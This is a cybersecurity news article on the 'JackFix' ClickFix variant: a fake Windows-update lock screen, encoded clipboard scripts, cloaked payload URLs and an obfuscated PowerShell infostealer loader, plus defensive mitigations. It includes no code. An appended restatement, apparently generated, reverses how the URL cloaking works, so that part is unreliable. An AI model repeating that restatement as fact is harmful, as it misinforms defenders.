'JackFix' Attack Circumvents ClickFix Mitigations TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsVulnerabilities & ThreatsCritical Flaw in Oracle Identity Manager Under ExploitationCritical Flaw in Oracle Identity Manager Under ExploitationbyRob WrightNov 24, 20252 Min ReadApplication SecurityInfamous Shai-hulud Worm Resurfaces From the DepthsInfamous Shai-hulud Worm Resurfaces From the DepthsbyAlexander CulafiNov 24, 20254 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificRecent in World See AllApplication SecurityLINE Messaging Bugs Open Asian Users to Cyber EspionageLINE Messaging Bugs Open Asian Users to Cyber EspionagebyTara SealsNov 21, 20257 Min ReadEndpoint SecurityChina's 'PlushDaemon' Hackers Infect Routers to Hijack Software UpdatesChina's 'PlushDaemon' Hackers Infect Routers to Hijack Software UpdatesbyNate Nelson, Contributing WriterNov 20, 20253 Min ReadThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryThreat IntelligenceCyber RiskCyberattacks & Data BreachesVulnerabilities & ThreatsNews'JackFix' Attack Circumvents ClickFix MitigationsA new ClickFix variant ratchets up the psychological pressure to 100 and addresses some technical mitigations to classic ClickFix attacks.Nate Nelson, Contributing WriterNovember 25, 20254 Min ReadSource: NorthScape via Alamy Stock PhotoA new spin on the ClickFix attack is making the rounds, and it's designed to circumvent some of the strategies organizations have for mitigating them.ClickFix and its slightly more elegant offshoot, FileFix, are notorious for being almost inexplicably manipulative. Attackers persuade victims to run commands on their computers that they never otherwise would, and may never have before.Now there's a new variant, deemed "JackFix," that gives more logical context to those strange actions victims are made to perform. JackFix ratchets up the psychological trickery to 100, with an anxiety-inducing phishing lure and an old-fashioned screen lock. And it has a few simple technical tricks for duping security solutions, too.The result: hundreds of reports of JackFix have been pouring into VirusTotal  — "much higher than other [ClickFix] campaigns we've seen recently," reports Acronis senior security researcher Eliad Kimhy. Those reports have largely been concentrated in the US, but also span across Europe.The JackFix Phishing LureIn the traditional ClickFix attack, victims are presented with some kind of fake technical issue. This does give context to the task they have to fulfill — copying and pasting code they don't understand into the Windows Run dialog — but it doesn't necessarily get the heart racing.Related:'Matrix Push' C2 Tool Hijacks Browser NotificationsTo really capture victims' attention and help them forget their better instincts, the seemingly Russian-speaking cybercriminals behind JackFix pulled from the old hacker playbook.Through malvertising or some other means of phishing, victims are attracted to fake versions of popular pornography sites, then as soon as they interact with the page, they're hit with a Windows blue screen. The screen is fake, but it does a solid job of recreating a real critical Windows update. It consumes the entire screen, and includes both a fake progress counter and the loading animation of dots traveling in a circle. Certain keyboard shortcuts are also blocked to prevent users escaping.For Kimhy, it recalls those sweat-inducing ransomware attacks of old. "Back in the early days of ransomware, attackers had figured out there is no need to completely ransom a computer's files, when you could just lock the screen and try to convince the victim to send you money," he wrote. A panicked user may be more likely to perform actions they're not used to — like running malicious commands in the Run dialog — and the format can be taken in any number of creative directions, Kimhy noted, which "may turn out to be far more compelling and flexible than a traditional ClickFix attack."Related:WhatsApp 'Eternidade' Trojan Self-Propagates Through BrazilHow JackFix Circumvents Security ProtectionsEven if the human victim of a ClickFix attack gets wrapped up in the ruse, there are plenty of ways security programs can pick up the slack.For instance, in a typical ClickFix attack, a website copies malicious code to the user's clipboard, then instructs them on how to run it. In theory, string- or pattern-based rules might catch the scripts that handle copying to the clipboard, and the known malicious actions that the victim runs on their machine. So JackFix encodes into an array both the Javascript used for copying to the clipboard, and the malicious commands the user is supposed to run, and only reconstructs them at runtime, in memory.Or say a victim runs an attacker's code in the Run dialog, and the code invokes a URL, where some malware lies. Any number of network security protections might detect traffic to a known malicious URL, and block it. To solve this, JackFix's URL performs content-based filtering, splitting incoming traffic into two groups. If a visitor reaches the site directly, it automatically redirects them to a benign website, like Google or Steam. Only when the site is reached through the JackFix attack flow does it reveal its true nature, and serve malware. This makes the site more difficult to analyze and less likely to be tagged by threat intelligence tools, and thus it largely avoids being flagged as malicious by programs that see it along the attack chain.Related:Akira RaaS Targets Nutanix VMs, Threatens Critical OrgsThe Powershell script downloaded from that URL is large and heavily obfuscated, with dead code and random variable names designed to defeat static analysis. It then prompts the user to grant it administrative privileges, and continues to pester them until they accept. After granting itself a variety of exclusions in Microsoft Defender, the script recruits a flurry of up to eight separate commercial malware samples. These include some of the most popular infostealers in the cyber underground — Rhadamanthys, Vidar 2.0, RedLine, and Amadey — plus a series of loaders. Acronis characterized it as "the most egregious example of spray and pray we've ever seen."In the end, there are ClickFix mitigations that JackFix doesn't address. For example, organizations can address all ClickFix variants by simply disabling Windows Run for certain employees that don't need it, using Group Policy settings. Or, Kimhy adds, "if the organization can do anything to limit the browser's ability to make a page full screen, that could take a lot of sting out of this attack."About the AuthorNate Nelson, Contributing WriterNate Nelson is a writer based in New York City. He formerly worked as a reporter at Threatpost, and wrote "Malicious Life," an award-winning Top 20 tech podcast on Apple and Spotify. Outside of Dark Reading, he also co-hosts "The Industrial Security Podcast."See more from Nate Nelson, Contributing WriterMore InsightsIndustry Reports2025 State of Threat Intelligence: What it means for your cybersecurity strategyGartner Innovation Insight: AI SOC AgentsState of AI and Automation in Threat IntelligenceGuide to Network Analysis Visibility SolutionsOrganizations Require a New Approach to Handle Investigation and Response in the CloudAccess More ResearchWebinarsIdentity Security in the Agentic AI EraHow AI & Autonomous Patching Eliminate Exposure RisksSecuring the Hybrid Workforce: Challenges and SolutionsCybersecurity Outlook 2026Threat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesMore WebinarsYou May Also LikeEditor's ChoiceCybersecurity OperationsDo National Data Laws Carry Cyber-Risks for Large Orgs?Do National Data Laws Carry Cyber-Risks for Large Orgs?byNate Nelson, Contributing WriterNov 19, 20254 Min ReadKeep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeWebinarsIdentity Security in the Agentic AI EraTues, Dec 9, 2025 at 1pm ESTHow AI & Autonomous Patching Eliminate Exposure RisksOn-DemandSecuring the Hybrid Workforce: Challenges and SolutionsTues, Nov 4, 2025 at 1pm ESTCybersecurity Outlook 2026Virtual Event | December 3rd, 2025 | 11:00am - 5:20pm ET | Doors Open at 10:30am ETThreat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesTuesday, Oct 21, 2025 at 1pm ESTMore WebinarsWhite PapersMissing 88% of Exploits: Rethinking KEV in the AI EraThe Straightforward Buyer's Guide to EDRThe True Cost of a Cyberattack - 2025 EditionHow to be a Better Threat HunterFrom the C-Suite to the SOC: Consolidating the Network Security SolutionsExplore More White PapersDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2025 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of Use

The proliferation of the ClickFix and FileFix attacks highlights a concerning trend in cybercriminal tactics – a shift towards psychological manipulation and technical circumvention of existing defenses. This new variant, dubbed “JackFix,” represents a particularly sophisticated evolution of these attacks, demonstrating an increased understanding of security protocols and the potential for exploiting human behavior. As detailed by Acronis senior security researcher Eliad Kimhy, JackFix incorporates several key elements that distinguish it from earlier iterations. Firstly, the attack employs a layered psychological approach, leveraging a convincingly realistic blue screen simulation combined with a carefully crafted narrative designed to induce a sense of panic and urgency in the victim. This tactic—drawing on the familiar, unsettling experience of Windows system errors—effectively bypasses conventional defenses centered on rational decision-making. The attack’s reliance on a simulated critical update further amplifies this effect, mimicking the response to legitimate system alerts, thereby increasing the likelihood that the user will comply with the attacker’s instructions.

The technical ingenuity of JackFix is equally noteworthy. Recognizing that traditional detection methods—such as monitoring clipboard activity to identify malicious code copying—could be utilized, the attackers implemented several countermeasures. These include encoding the Javascript for clipboard manipulation and the malicious commands within an array, reconstructing them only at runtime within memory. This eliminates static analysis, a common defense mechanism, and significantly raises the bar for intrusion detection systems. Furthermore, the attack avoids direct URL redirection, instead utilizing content-based filtering within the browser. When the attack is initiated through a manipulated website (such as a fake pornography site), the browser is automatically redirected to a benign site like Google or Steam, effectively masking the malicious activity. This approach cleverly avoids triggering threat intelligence tools that rely on identifying known malicious URLs.

Beyond technical countermeasures, JackFix incorporates a “spray and pray” technique, deploying a large, heavily obfuscated PowerShell script that recruits multiple commercial malware samples. This script utilizes dead code and random variable names to deliberately evade static analysis and incorporates exclusions in Microsoft Defender, further complicating detection efforts. The incorporation of widely-used infostealers – Rhadamanthys, Vidar 2.0, RedLine, and Amadey – exemplifies the attacker’s strategy of maximizing their impact. The resulting attack is characterized by Acronis as “the most egregious example of spray and pray we've ever seen,” emphasizing the volume and indiscriminate nature of the malware deployment.

Despite these sophisticated defenses employed by the attackers, several legacy mitigations remain viable. Organizations can address all ClickFix variants simply by disabling Windows Run for employees who do not require it, implementing these restrictions via Group Policy settings. Additionally, limiting the browser’s ability to make a page full screen would diminish the effectiveness of the blue screen ruse. However, the evolution of attacks like JackFix necessitates a proactive and layered security approach. The ability to quickly adapt defenses and continually assess the threat landscape is increasingly crucial. Ongoing research into effective countermeasures and continuous monitoring of security platforms is essential for safeguarding against evolving threats such as this. The case of JackFix underscores the importance of human element recognition within cybersecurity strategy, alongside technological defenses.